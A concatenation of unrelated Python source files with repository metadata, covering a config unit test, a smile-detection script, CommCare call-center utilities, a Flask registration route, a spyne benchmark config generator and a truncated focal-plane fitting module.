self.runtime += 1
def code(self, h=None, m=None, s=None, dry=False):
"""
Calculate a new timecode
"""
if h is None and m is None and s is None:
h = time.localtime().tm_hour
m = time.localtime().tm_min
s = time.localtime().tm_sec
if h is None:
h = 0
if m is None:
m = 0
if s is None:
s = 0
if isinstance(h, tuple):
if len(h) > 2:
s = h[2]
if len(h) > 1:
m = h[1]
h = h[0]
ret = math.floor(((h * 60) + m + (s / 60)) / self._minPerTimeCode)
if not dry:
self.latestCode = ret
return ret
def timestamp(self, code=None):
"""
Return the timestring of a timecode
"""
if code is None:
code = self.latestCode
minutes = code * self._minPerTimeCode
h = math.floor(minutes / 60)
m = math.floor(minutes % 60)
s = math.floor((minutes % 1) * 60)
return "%02d:%02d:%02d" % (h, m, s)
| 3.140625 | 3 |
tests/Util/test_config.py | JI511/Personal_Fitness | 0 | 34180 | # ----------------------------------------------------------------------------------------------------------------------
# Config test cases
# ----------------------------------------------------------------------------------------------------------------------
# imports
import unittest
import tempfile
import os
import shutil
import logging
from src.Util.config import Config
from src.Util.constants import Constants
class TestConfig(unittest.TestCase):
"""
Class for testing the body weight procedure.
"""
def setUp(self):
"""
Initializes unit test variables.
"""
self.logs_dir = tempfile.mkdtemp()
self.file_path = os.path.join(self.logs_dir, 'test_config.ini')
self.logger = logging.getLogger(__name__)
self.config = Config(logger=self.logger,
output_path=self.logs_dir)
self.section = 'OPTIONS'
self.option = 'water'
def tearDown(self):
"""
Performs any clean up needed.
"""
self.connection = None
if os.path.exists(self.logs_dir):
shutil.rmtree(self.logs_dir)
# ------------------------------------------------------------------------------------------------------------------
# read_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_read_config_option_nominal(self):
"""
Checks that the default config file is created properly.
"""
value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, "oz")
def test_read_config_option_bad_option(self):
"""
Attempts to get a bad value in the config file.
"""
        with self.assertRaises(KeyError) as error:
            self.config.read_config_option(section=self.section,
                                           option="bad")
        # The assertion must run after the context manager exits, otherwise
        # the raised KeyError would skip it; also, `in` needs the string form.
        self.assertTrue('bad' in str(error.exception))
# ------------------------------------------------------------------------------------------------------------------
# update_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_update_config_option_nominal(self):
"""
Updates a config value to be used in the future.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, water_type)
def test_update_config_retain_unique_values(self):
"""
Updating an option should keep unaffected values the same when rewriting.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
value = '5'
status = self.config.update_config_option(section=self.section,
option='backup_rate',
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
backup_rate = self.config.read_config_option(section=self.section,
option='backup_rate')
self.assertEqual(water_type, 'mL')
self.assertEqual(backup_rate, '5')
def test_update_config_option_bad_section(self):
"""
Attempts to change a config option with a section that does not exist.
"""
status = self.config.update_config_option(section='bad',
option=self.option,
value='mL')
self.assertFalse(status)
def test_update_config_option_bad_option(self):
"""
Attempts to change a config option that does not exist.
"""
status = self.config.update_config_option(section=self.section,
option='bad',
value='mL')
self.assertFalse(status)
# ------------------------------------------------------------------------------------------------------------------
# check_config_file_values tests
# ------------------------------------------------------------------------------------------------------------------
def test_check_config_file_values_nominal(self):
"""
A new default has been added to a section. Add the default value to an already existing config file. The old
config values will remain.
"""
Constants.config_defaults[self.section]['test'] = 'new'
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
self.config.check_config_file_values()
added_default = self.config.read_config_option(section=self.section,
option='test')
self.assertEqual(added_default, 'new')
old_value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(old_value, 'mL')
# ------------------------------------------------------------------------------------------------------------------
# create_backup_database tests
# ------------------------------------------------------------------------------------------------------------------
def test_create_backup_database_nominal(self):
"""
Creates a backup database when no other backups are present
"""
pass
def test_create_backup_database_already_exists(self):
"""
Checks for a backup database file, and sees that one has been created within the backup rate.
"""
pass
def test_create_backup_database_needed(self):
"""
Checks for a backup database file, one does exist, but a new one is needed.
"""
pass
def test_create_backup_database_no_backup_db_folder(self):
"""
Creates the backup_db folder within the cwd if it does not already exist.
"""
pass
# ----------------------------------------------------------------------------------------------------------------------
# End
# --------------------------------------------------------------------------------------------------------------------
| 1.664063 | 2 |
predict.py | zahrabashir98/SmileDetection | 17 | 34308 | import sys
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import time
model = load_model("models/model.h5")
def find_faces(image):
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_default.xml')
face_rects = face_cascade.detectMultiScale(
image,
scaleFactor = 1.1,
minNeighbors = 22
)
return face_rects
def load_image(filepath):
image = cv2.imread(filepath)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
gray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
return image, gray_image
def predict(gray_image):
face_rects = find_faces(gray_image)
for face_rect in face_rects:
x, y, w, h = face_rect
face = gray_image[y:y+h, x:x+w]
face = cv2.resize(face, (48, 48)).reshape((1, 48, 48, 1))
predicted_emotions = model.predict(face)[0]
        # NOTE: the label order is assumed from this comparison --
        # index 0 -> neutral, index 1 -> happiness.
        best_emotion = 'happiness' if predicted_emotions[1] > predicted_emotions[0] else 'neutral'
# Create a json serializable result
yield dict(
border = dict(
x = float(x),
y = float(y),
width = float(w),
height = float(h),
),
            prediction = {'neutral': float(predicted_emotions[0]), 'happiness': float(predicted_emotions[1])},
emotion = best_emotion
)
def put_text(image, rect, text):
x, y, w, h = rect
font = cv2.FONT_HERSHEY_SIMPLEX
font_scale = h / 30.0
font_thickness = int(round(font_scale * 1.5))
text_size, _ = cv2.getTextSize(text, font, font_scale, font_thickness)
center_text_x = x + (w // 2)
center_text_y = y + (h // 2)
text_w, text_h = text_size
lower_left_text_x = center_text_x - (text_w // 2)
lower_left_text_y = center_text_y + (text_h // 2)
cv2.putText(
image, text,
(lower_left_text_x, lower_left_text_y),
font, font_scale, (0, 255, 0), font_thickness
)
def draw_face_info(image, face_info):
x = int(face_info['border']['x'])
y = int(face_info['border']['y'])
w = int(face_info['border']['width'])
h = int(face_info['border']['height'])
emotion = face_info['emotion']
cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)
put_text(image, (x, y, w, h // 5), emotion)
def show_image(image, title='Result'):
plt.subplot(111), plt.imshow(image), plt.title(title)
plt.show()
if __name__ == '__main__':
# start time
start_time = time.time()
image, gray_image = load_image(sys.argv[1])
for face_info in predict(gray_image):
print(face_info)
draw_face_info(image, face_info)
# end time
end_time = time.time()
show_image(image)
response_time = end_time - start_time
print(response_time)
| 2.203125 | 2 |
emenu/conftest.py | Ryszyy/emenu | 0 | 34436 | <gh_stars>0
import pytest
from django.contrib.auth import get_user_model
from emenu.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> get_user_model(): # type: ignore
return UserFactory()
| 0.984375 | 1 |
corehq/apps/callcenter/utils.py | johan--/commcare-hq | 0 | 34564 | from __future__ import absolute_import
from collections import namedtuple
from datetime import datetime, timedelta
import pytz
from casexml.apps.case.dbaccessors import get_open_case_docs_in_domain
from casexml.apps.case.mock import CaseBlock
from casexml.apps.case.xml import V2
import uuid
from xml.etree import ElementTree
from corehq.apps.app_manager.const import USERCASE_TYPE
from corehq.apps.domain.models import Domain
from corehq.apps.es.domains import DomainES
from corehq.apps.es import filters
from corehq.apps.hqcase.utils import submit_case_blocks, get_case_by_domain_hq_user_id
from corehq.feature_previews import CALLCENTER
from corehq.util.quickcache import quickcache
from corehq.util.timezones.conversions import UserTime, ServerTime
from dimagi.utils.couch import CriticalSection
class DomainLite(namedtuple('DomainLite', 'name default_timezone cc_case_type use_fixtures')):
def midnights(self, utcnow=None):
"""Returns a list containing two datetimes in UTC that corresponds to midnight
in the domains timezone on either side of the current UTC datetime.
i.e. [<previous midnight in TZ>, <next midnight in TZ>]
>>> d = DomainLite('', 'Asia/Kolkata', '', True)
>>> d.midnights(datetime(2015, 8, 27, 18, 30, 0 ))
[datetime.datetime(2015, 8, 26, 18, 30), datetime.datetime(2015, 8, 27, 18, 30)]
>>> d.midnights(datetime(2015, 8, 27, 18, 31, 0 ))
[datetime.datetime(2015, 8, 27, 18, 30), datetime.datetime(2015, 8, 28, 18, 30)]
"""
utcnow = utcnow or datetime.utcnow()
tz = pytz.timezone(self.default_timezone)
current_time_tz = ServerTime(utcnow).user_time(tz).done()
midnight_tz1 = current_time_tz.replace(hour=0, minute=0, second=0, microsecond=0)
midnight_tz_utc1 = UserTime(midnight_tz1).server_time().done()
midnight_tz_utc2 = midnight_tz_utc1 + timedelta(days=(1 if midnight_tz_utc1 < utcnow else -1))
return sorted([midnight_tz_utc1, midnight_tz_utc2])
CallCenterCase = namedtuple('CallCenterCase', 'case_id hq_user_id')
def sync_user_case(commcare_user, case_type, owner_id):
"""
Each time a CommCareUser is saved this method gets called and creates or updates
a case associated with the user with the user's details.
This is also called to create user cases when the usercase is used for the
first time.
"""
with CriticalSection(['user_case_%s_for_%s' % (case_type, commcare_user._id)]):
domain = commcare_user.project
def valid_element_name(name):
try:
ElementTree.fromstring('<{}/>'.format(name))
return True
except ElementTree.ParseError:
return False
# remove any keys that aren't valid XML element names
fields = {k: v for k, v in commcare_user.user_data.items() if valid_element_name(k)}
# language or phone_number can be null and will break
# case submission
fields.update({
'name': commcare_user.name or commcare_user.raw_username,
'username': commcare_user.raw_username,
'email': commcare_user.email,
'language': commcare_user.language or '',
'phone_number': commcare_user.phone_number or ''
})
case = get_case_by_domain_hq_user_id(domain.name, commcare_user._id, case_type)
close = commcare_user.to_be_deleted() or not commcare_user.is_active
caseblock = None
if case:
props = dict(case.dynamic_case_properties())
changed = close != case.closed
changed = changed or case.type != case_type
changed = changed or case.name != fields['name']
changed = changed or case.owner_id != owner_id
if not changed:
for field, value in fields.items():
if field != 'name' and props.get(field) != value:
changed = True
break
if changed:
caseblock = CaseBlock(
create=False,
case_id=case._id,
owner_id=owner_id,
case_type=case_type,
close=close,
update=fields
)
else:
fields['hq_user_id'] = commcare_user._id
caseblock = CaseBlock(
create=True,
case_id=uuid.uuid4().hex,
owner_id=owner_id,
user_id=owner_id,
case_type=case_type,
update=fields
)
if caseblock:
casexml = ElementTree.tostring(caseblock.as_xml())
submit_case_blocks(casexml, domain.name)
def sync_call_center_user_case(user):
domain = user.project
if domain and domain.call_center_config.enabled:
owner_id = domain.call_center_config.case_owner_id
if domain.call_center_config.use_user_location_as_owner:
owner_id = user.location_id
sync_user_case(
user,
domain.call_center_config.case_type,
owner_id
)
def sync_usercase(user):
domain = user.project
if domain and domain.usercase_enabled:
sync_user_case(
user,
USERCASE_TYPE,
user.get_id
)
def is_midnight_for_domain(midnight_form_domain, error_margin=15, current_time=None):
current_time = current_time or datetime.utcnow()
diff = current_time - midnight_form_domain
return diff.days >= 0 and diff < timedelta(minutes=error_margin)
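# Added illustrative check (sketch): ten minutes past the stored midnight is
# still "midnight" under the default 15-minute error margin.
#   >>> is_midnight_for_domain(datetime(2015, 8, 27, 18, 30),
#   ...                        current_time=datetime(2015, 8, 27, 18, 40))
#   True
#   >>> is_midnight_for_domain(datetime(2015, 8, 27, 18, 30),
#   ...                        current_time=datetime(2015, 8, 27, 18, 50))
#   False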
def get_call_center_domains():
result = (
DomainES()
.is_active()
.is_snapshot(False)
.filter(filters.term('call_center_config.enabled', True))
.fields(['name', 'default_timezone', 'call_center_config.case_type', 'call_center_config.use_fixtures'])
.run()
)
def to_domain_lite(hit):
return DomainLite(
name=hit['name'],
default_timezone=hit['default_timezone'],
cc_case_type=hit.get('call_center_config.case_type', ''),
use_fixtures=hit.get('call_center_config.use_fixtures', True)
)
return [to_domain_lite(hit) for hit in result.hits]
def get_call_center_cases(domain_name, case_type, user=None):
all_cases = []
if user:
docs = (doc for owner_id in user.get_owner_ids()
for doc in get_open_case_docs_in_domain(domain_name, case_type,
owner_id=owner_id))
else:
docs = get_open_case_docs_in_domain(domain_name, case_type)
for case_doc in docs:
hq_user_id = case_doc.get('hq_user_id', None)
if hq_user_id:
all_cases.append(CallCenterCase(
case_id=case_doc['_id'],
hq_user_id=hq_user_id
))
return all_cases
@quickcache(['domain'])
def get_call_center_case_type_if_enabled(domain):
if CALLCENTER.enabled(domain):
return Domain.get_by_name(domain).call_center_config.case_type
| 1.570313 | 2 |
apps/brew/settings.py | martync/zython | 0 | 34692 | SRM_TO_HEX = {
"0": "#FFFFFF",
"1": "#F3F993",
"2": "#F5F75C",
"3": "#F6F513",
"4": "#EAE615",
"5": "#E0D01B",
"6": "#D5BC26",
"7": "#CDAA37",
"8": "#C1963C",
"9": "#BE8C3A",
"10": "#BE823A",
"11": "#C17A37",
"12": "#BF7138",
"13": "#BC6733",
"14": "#B26033",
"15": "#A85839",
"16": "#985336",
"17": "#8D4C32",
"18": "#7C452D",
"19": "#6B3A1E",
"20": "#5D341A",
"21": "#4E2A0C",
"22": "#4A2727",
"23": "#361F1B",
"24": "#261716",
"25": "#231716",
"26": "#19100F",
"27": "#16100F",
"28": "#120D0C",
"29": "#100B0A",
"30": "#050B0A"
}
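# Added convenience sketch (not part of the original module): clamp arbitrary
# SRM values into the table's 0-30 span before looking up the hex colour.
def srm_to_hex(srm):
    srm = max(0, min(30, int(round(srm))))
    return SRM_TO_HEX[str(srm)]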
WATER_L_PER_GRAIN_KG = 2.5
MAIN_STYLES = {
"1": "LIGHT LAGER",
"2": "PILSNER",
"3": "EUROPEAN AMBER LAGER",
"4": "DARK LAGER",
"5": "BOCK",
"6": "LIGHT HYBRID BEER",
"7": "AMBER HYBRID BEER",
"8": "ENGLISH PALE ALE",
"9": "SCOTTISH AND IRISH ALE",
"10": "AMERICAN ALE",
"11": "ENGLISH BROWN ALE",
"12": "PORTER",
"13": "STOUT",
"14": "INDIA PALE ALE (IPA)",
"15": "GERMAN WHEAT AND RYE BEER",
"16": "BELGIAN AND FRENCH ALE",
"17": "SOUR ALE",
"18": "BELGIAN STRONG ALE",
"19": "STRONG ALE",
"20": "FRUIT BEER",
"21": "SPICE / HERB / VEGETABLE BEER",
"22": "SMOKE-FLAVORED AND WOOD-AGED BEER",
"23": "SPECIALTY BEER",
"24": "TRADITIONAL MEAD",
"25": "MELOMEL (FRUIT MEAD)",
"26": "OTHER MEAD",
"27": "STANDARD CIDER AND PERRY",
"28": "SPECIALTY CIDER AND PERRY"
}
| 0.949219 | 1 |
api/routes/user_router.py | cgiroux86/TeamInterview | 1 | 34820 | from flask import Blueprint, request, jsonify
from api.models.user_model import User, UserPasswords, db
from flask_bcrypt import generate_password_hash
user_bp = Blueprint('user_bp', __name__)
def validate_register_fields(req):
data = req.get_json(silent=True)
fields = ['first_name', 'last_name', 'email', 'password']
for f in fields:
if f not in data:
return False
return True
@user_bp.route('/test', methods=['POST'])
def test():
return f'{validate_register_fields(request)}'
@user_bp.route('/register', methods=['POST'])
def register():
if validate_register_fields(request):
data = request.get_json(silent=True)
first_name = data['first_name']
last_name = data['last_name']
email = data['email']
        # Hash the password before persisting it; storing the raw value would
        # make the digest column meaningless.
        digest = generate_password_hash(data['password']).decode('utf-8')
user = User(
first_name=first_name,
last_name=last_name,
email=email,
)
try:
db.session.add(user)
db.session.commit()
except Exception as e:
return(str(e))
try:
user_pw = UserPasswords(
user_id=user.id,
digest=digest
)
db.session.add(user_pw)
db.session.commit()
return jsonify(user.serialize()), 201
except Exception as e:
return str(e)
else:
        return jsonify(error='missing required fields'), 400
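# Added usage sketch: exercising the blueprint through Flask's test client;
# the create_app factory name below is hypothetical.
#   from api import create_app
#   client = create_app().test_client()
#   resp = client.post('/register', json={
#       'first_name': 'Ada', 'last_name': 'Lovelace',
#       'email': 'ada@example.com', 'password': 's3cret'})
#   assert resp.status_code == 201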
| 1.632813 | 2 |
webtool/server/models/equipment.py | wodo/WebTool3 | 13 | 34948 | <filename>webtool/server/models/equipment.py
# -*- coding: utf-8 -*-
from django.db import models
from .mixins import SeasonsMixin
from .time_base import TimeMixin
from . import fields
class EquipmentManager(models.Manager):
def get_by_natural_key(self, code):
return self.get(code=code)
class Equipment(SeasonsMixin, TimeMixin, models.Model):
objects = EquipmentManager()
code = models.CharField(
'Kurzzeichen',
unique=True,
max_length=10,
help_text="Kurzzeichen für die Ausrüstung",
)
name = fields.NameField(
'Bezeichnung',
help_text="Bezeichnung der Ausrüstung",
)
description = fields.DescriptionField(
'Beschreibung',
help_text="Beschreibung der Ausrüstung",
)
default = models.BooleanField(
'Die initiale Ausrüstung',
blank=True, default=False
)
def natural_key(self):
return self.code,
natural_key.dependencies = ['server.season']
def __str__(self):
return "{} ({})".format(self.name, self.code)
class Meta:
get_latest_by = "updated"
verbose_name = "Ausrüstung"
verbose_name_plural = "Ausrüstungen"
unique_together = ('code', 'name')
ordering = ('code', ) | 1.375 | 1 |
frameworks/Python/spyne/gen_benchmark_config.py | xsoheilalizadeh/FrameworkBenchmarks | 5,300 | 35076 | <filename>frameworks/Python/spyne/gen_benchmark_config.py
#!/usr/bin/env python
from __future__ import print_function
import json
from spyne import AnyUri, Unicode, ComplexModel, M, UnsignedInteger16, Array
from spyne.protocol.json import JsonDocument
from spyne.util.dictdoc import get_object_as_dict
class BenchmarkConfigElement(ComplexModel):
# exclude this from the output document
key = Unicode(pa={JsonDocument: dict(exc=True)})
display_name = M(Unicode)
notes = Unicode
versus = Unicode
db_url = AnyUri
json_url = AnyUri
query_url = AnyUri
fortune_url = AnyUri
update_url = AnyUri
plaintext_url = AnyUri
port = M(UnsignedInteger16(default=8080))
approach = M(Unicode(values=['Realistic', 'Stripped'], default='Realistic'))
classification = M(Unicode(values=['Micro', 'Fullstack', 'Platform'], default='Micro'))
database = M(Unicode(values=['none', 'mongodb', 'postgres', 'mysql'], default='none'))
orm = M(Unicode(values=['Full', 'Micro', 'None', 'Raw']))
framework = M(Unicode)
language = M(Unicode)
flavor = M(Unicode)
platform = M(Unicode)
webserver = M(Unicode)
os = M(Unicode(default='Linux'))
database_os = M(Unicode(default='Linux'))
class BenchmarkConfig(ComplexModel):
framework = M(Unicode)
tests = Array(BenchmarkConfigElement, wrapped=False)
gen_raw_test = lambda: BenchmarkConfigElement(
display_name="Spyne RAW",
db_url="/dbsraw",
query_url="/dbraw?queries=",
fortune_url="/fortunesraw",
update_url="/raw-updates?queries=",
orm='Raw',
)
gen_normal_test = lambda: BenchmarkConfigElement(
display_name="Spyne ORM",
db_url="/dbs",
query_url="/db?queries=",
fortune_url="/fortunes",
update_url="/updatesraw?queries=",
orm='Full',
)
def add_common(bc):
bc.port = 8080
bc.approach = "Realistic"
bc.classification = "Micro"
bc.database = "postgres"
bc.framework = "spyne"
bc.language = "Python"
bc.platform = "Spyne"
bc.webserver = "None"
bc.os = "Linux"
bc.database_os = "Linux"
bc.versus = "wsgi"
bc.plaintext_url = "/plaintext"
return bc
config = BenchmarkConfig(framework='spyne', tests=[])
keys = iter(['default', 'raw', 'py3orm', 'py3raw'])
for flav in ['CPython', 'Python3']:
bc = add_common(gen_normal_test())
bc.flavor = flav
bc.key = next(keys)
config.tests.append(bc)
bc = add_common(gen_raw_test())
bc.flavor = flav
bc.key = next(keys)
config.tests.append(bc)
data = get_object_as_dict(config, complex_as=dict)
data['tests'] = [{d['key']: d} for d in data['tests']]
data = json.dumps(data, indent=2, sort_keys=True, separators=(',', ': '))
with open('benchmark_config.json', 'w') as f:
    f.write(data)
print(data)
| 1.359375 | 1 |
main.py | Forcide/ApacheParser | 0 | 35204 | <reponame>Forcide/ApacheParser
from modules import menu, hosts, logMail, status, webpagina, zoekInLog
def main():
""""
Dit is de start file/functie van het programma, hierin worden alle modules geladen en zo nodig uitgevoerd.
Het menu wordt gestart en de keuze wordt verwezen naar een van de modules.
Geimporteerde modules:
- menu
- hosts
- logMail
- status
- webpagina
- zoekInLog
"""
keuze = menu.menu()
if keuze == 1:
logMail.logMail()
elif keuze == 2:
webpagina.bezochteWebpagina()
elif keuze == 3:
hosts.uniekeHosts()
elif keuze == 4:
status.aantalStatus()
elif keuze == 5:
zoekInLog.zoekInLog()
elif keuze == 6:
exit()
hoofdmenu = menu.menuAfsluiten()
if hoofdmenu == 'J':
main()
elif hoofdmenu == 'N':
exit()
main()
| 1.0625 | 1 |
python/analysis/fp_fit/fp_file.py | ACTCollaboration/moby2 | 3 | 35332 | #!/usr/bin/python
from __future__ import print_function
from __future__ import absolute_import
from past.builtins import basestring
import sys
import numpy as np
import moby2
trace = moby2.util.log.logger.trace
# transitional...
_fp_formats = {
'det_uid': '%4d',
'ok': '%1d',
'x0': '%9.6f',
'x0_err': '%9.6f',
'y0': '%9.6f',
'y0_err': '%9.6f',
'tau': '%8.5f',
'tau_err': '%8.5f',
'h': '%.4e',
'w': '%9.6f',
'sn': '%9.1f',
'base': '%.5e',
'n_obs': '%3d',
}
_fp_fields = ['ok', 'x0', 'x0_err', 'y0', 'y0_err', 'tau', 'tau_err',
'h', 'w', 'sn', 'base', 'n_obs']
_fp_columns_format_str = ' '.join(['{%s:%s}'%(k, _fp_formats[k][1:])
for k in _fp_fields]) + '\n'
class FPFitFile(moby2.detectors._SimpleDetData):
fields = _fp_fields
dtypes = {'ok': bool, 'n_obs': int}
columns_format_str = _fp_columns_format_str
xcfs = '{det_uid:4d} {ok:1d} '\
'{x0:9.6f} {x0_err:9.6f} {y0:9.6f} {y0_err:9.6f} '\
'{tau:8.5f} {tau_err:8.5f} '\
'{h:.4e} {w:9.6f} {sn:9.1f} {n_obs:3d}\n'
header = '# det_uid ok x0 x0_err y0 y0_err '\
'tau tau_err h w sn n_obs'
def __init__(self, det_uid=None):
if det_uid is not None:
self.det_uid = np.array(det_uid, dtype='int64')
n = len(det_uid)
for f in self.fields:
setattr(self, f, np.zeros(n, self.dtypes.get(f, 'float64')))
def __repr__(self):
name = repr(self.__class__)
return '%s with %i det_uid for fields ' % (name, len(self.det_uid)) + \
','.join(self.fields)
def update_row(self, row, data):
for k in self.fields:
if k in data:
getattr(self, k)[row] = data[k]
@classmethod
def from_columns_file(cls, filename):
data = np.loadtxt(filename, unpack=1)
det_uid = data[0].astype('int')
self = cls(det_uid)
self.ok = data[1].astype('int').astype('bool')
if len(data[2:]) == 11:
            (self.x0, self.x0_err, self.y0, self.y0_err, self.tau,
             self.tau_err, self.h, self.w, self.sn, self.base,
             self.n_obs) = data[2:]
elif len(data[2:-1]) == 9:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn = data[2:-1]
self.base = 0 * self.w
elif len(data[2:-1]) == 8:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.sn = data[2:-1]
self.w = 0 * self.x0
self.base = 0 * self.x0
elif len(data[2:-1]) == 4:
self.x0, self.x0_err, self.y0, self.y0_err = data[2:-1]
            self.base = 0 * self.x0
else:
raise ValueError("Strange number of columns in %s" % filename)
self.n_obs = data[-1].astype('int')
return self
@classmethod
def from_file(cls, filename):
if filename.endswith('fits') or filename.endswith('fits.gz'):
return cls.from_fits_table(filename)
return cls.from_columns_file(filename)
# This supercedes _SimpleDetData.write
def write(self, filename, format=None):
if format is None:
if filename.endswith('fits') or filename.endswith('fits.gz'):
format = 'fits'
else:
format = 'txt'
data = [('det_uid', self.det_uid)]
for k in self.fields:
v = getattr(self, k)
if v.dtype == bool:
v = v.astype('int8')
data.append((k, v))
odb = moby2.util.StructDB.from_data(data,formats=_fp_formats)
if format == 'fits':
odb.to_fits_table(filename)
elif format == 'txt':
odb.to_column_file(filename)
else:
raise ValueError("Unknown format request, %s." % format)
def write_reduced(self, filename, scale_amp=1.):
format = 'txt'
if filename.endswith('.fits') or filename.endswith('.fits.gz'):
format = 'fits'
s = self.ok.astype(bool)
# det_uid peak_DAC SN tau
data = [('det_uid', self.det_uid[s]),
('peak_dac', self.h[s] * scale_amp),
('time_const', self.tau[s]),
('sn', self.sn[s]),
]
odb = moby2.util.StructDB.from_data(
data, formats={'peak_dac': '%12.3f',
'time_const': '%12.5f',
'sn': '%12.3f'})
if format == 'txt':
odb.to_column_file(filename)
elif format == 'fits':
odb.to_fits_table(filename)
@classmethod
def from_focal_plane(cls, fp):
"""
Initialize from a FocalPlane object.
"""
self = cls(fp.det_uid)
self.x0 = fp.x.copy()
self.y0 = fp.y.copy()
self.ok = fp.mask.copy()
zeros = np.zeros(self.ok.shape)
self.tau, self.h, self.w = zeros.copy(), zeros.copy(), zeros.copy()
self.base = zeros
return self
@classmethod
def combine_fits(cls, fits, template=None, params={}):
"""
Combine fits by shifting each one to match a template, and
averaging the good fits for each detector.
If a template is not provided, match to the first one.
"""
trace(1, 'Fitting and averaging %i fits' % len(fits))
if template is None:
template = fits[0]
# Start by shifting each fit to match the template.
orig_fits, fits = fits, []
fitter = FPTemplateFitter()
fitter.set_template(template)
fit_params = {'shift': True,
'rotation': False}
fit_params.update(params)
fit_results = [None for fi in range(len(orig_fits))]
for fi,f0 in enumerate(orig_fits):
if f0.ok.sum() < params.get('min_dets', 50):
trace(2, 'Discarding fit with only %i good fits' % f0.ok.sum())
continue
ok, result = fitter.fit(f0, fit_params)
if not ok:
trace(2, 'Discarding fit due to failed template match')
continue
f1 = f0.copy()
f1.x0 += result[0]
f1.y0 += result[1]
fits.append(f1)
fit_results[fi] = result
trace(1, 'Cut %i of %i fits (increase verbosity to see why).' % \
(len(orig_fits) - len(fits), len(orig_fits)))
if len(fits) == 0:
return None, None
print([len(f.det_uid) for f in fits])
n_det_uid = max([f.det_uid.max() for f in fits]) + 1
output = cls(np.arange(n_det_uid))
output.ok[:] = False
ARCMIN = np.pi/180/60
trace(1, 'Combining data for %i detectors' % n_det_uid)
for uid in output.det_uid:
ok = np.array([f.get_property('ok', det_uid=uid)[1]
for f in fits])
x, y, tau = np.transpose([f.get_property(['x0','y0','tau'], det_uid=uid)[1]
for f in fits])
for _x in [x, y, tau]:
# Yes, this happens...
ok *= ~np.isnan(_x) * ~np.isinf(_x)
x, y, tau = [_x[ok] for _x in [x,y,tau]]
if ok.sum() < params.get('min_obs', 1):
trace(2, 'Discarding det_uid=%i due to only %i contributors'
% (uid, ok.sum()))
continue
# Majority rules.
x0, y0 = np.median(x), np.median(y)
for iteration in [0,1,2]:
d0 = ((x - x0)**2 + (y-y0)**2)**.5
s0 = d0 < params.get('max_separation', 1)*ARCMIN
if s0.sum() == 0:
break
x0, y0 = x[s0].mean(), y[s0].mean()
if s0.sum() <= 0:
trace(2, 'Discarding det_uid=%i due to only %i items in '\
' combination' % (uid, s0.sum()))
continue
vals = {
'x0': x0, 'y0': y0,
'x0_err': x[s0].std(),
'y0_err': y[s0].std(),
'tau': tau[s0].mean(),
'tau_err': tau[s0].std(),
'n_obs': s0.sum(),
'ok': s0.sum() >= params.get('min_obs', 1) }
output.update_row(uid, vals)
trace(2, 'Result for det_uid=%i' % uid)
for k in ['x0', 'y0', 'tau']:
trace(2, ' %s = %10.5f +- %10.5f' % (k, vals[k], vals[k+'_err']))
return output, fit_results
def plot_positions(self, filename, auto_zoom=True, params={},
title='', fig=None):
import pylab as pl
if fig is None:
pl.figure()
pl.gcf().set_size_inches(6., 6.)
else:
pl.figure(fig.number)
s = self.ok
if s.sum() == 0:
pl.title(title + ' - no good fits')
pl.savefig(filename)
pl.clf()
units = params.get('units', 'deg')
scale = {'rad': 1., 'deg': 180/np.pi, 'arcmin': 60*180/np.pi}[units]
x, y = self.x0[s]*scale, self.y0[s]*scale
x0, y0 = np.median(x), np.median(y)
r = ((x-x0)**2 + (y-y0)**2)**.5
window = np.median(r)*3
inside = r < params.get('zoom', scale*window)
pl.scatter(x, y, alpha=0.5)
if params.get('limits') is None:
if np.any(inside):
for vect,limiter in [(x,pl.xlim), (y,pl.ylim)]:
lo, hi = limiter()
lo = min(lo, vect[inside].min())
hi = max(hi, vect[inside].max())
limiter(lo, hi)
else:
xlims, ylims = params['limits']
pl.xlim(*xlims), pl.ylim(*ylims)
pl.title(title + ' - %i dets outside window' % (~inside).sum())
pl.xlabel('X (%s)' % units)
pl.ylabel('Y (%s)' % units)
def smart_locate(ax, n_max, bases=[1,2,5]):
x0, x1 = ax.get_view_interval()
if x1 == x0:
return
delta = (x1-x0) / (n_max-1)
# Find smallest base and p such delta < base*10^p
log_spacing = min([
np.ceil(np.log10(delta) - np.log10(b)) + np.log10(b)
for b in bases])
loc = pl.MultipleLocator(10**log_spacing)
ax.set_major_locator(loc)
smart_locate(pl.gca().xaxis, 6)
smart_locate(pl.gca().yaxis, 9)
pl.savefig(filename)
pl.clf()
pl.figure()
def plot_rowcol_summaries(self, filename, array_data):
import pylab as pl
def x_eyes(bads=None):
# Mark bad fits with an x.
if bads is None:
bads = ~s
pl.scatter(cols[bads], rows[bads], marker='x', edgecolor='gray')
def limit_args(data, kw={}):
lo, hi = data.min(), data.max()
if s.sum() > 1:
lo, hi = data[s].min(), data[s].max()
if hi == lo:
hi = lo + 1
kw.update({'vmin': lo, 'vmax': hi})
return kw
def bin(data, dtype='float'):
out = np.zeros((n_rows, n_cols), dtype)
out[rows, cols] = data
return out
def imshow_reformat():
# Tighten boundaries, add labels...
pl.xlabel('Column')
pl.ylabel('Row')
pl.xlim(-0.5, n_cols-0.5)
pl.ylim(-0.5, n_rows-0.5)
s = self.ok
rows, cols = array_data.get_property(['row', 'col'], det_uid=self.det_uid)
n_rows, n_cols = rows.max()+1, cols.max()+1
# Init plotting
pl.figure()
pl.gcf().set_size_inches(6., 6.)
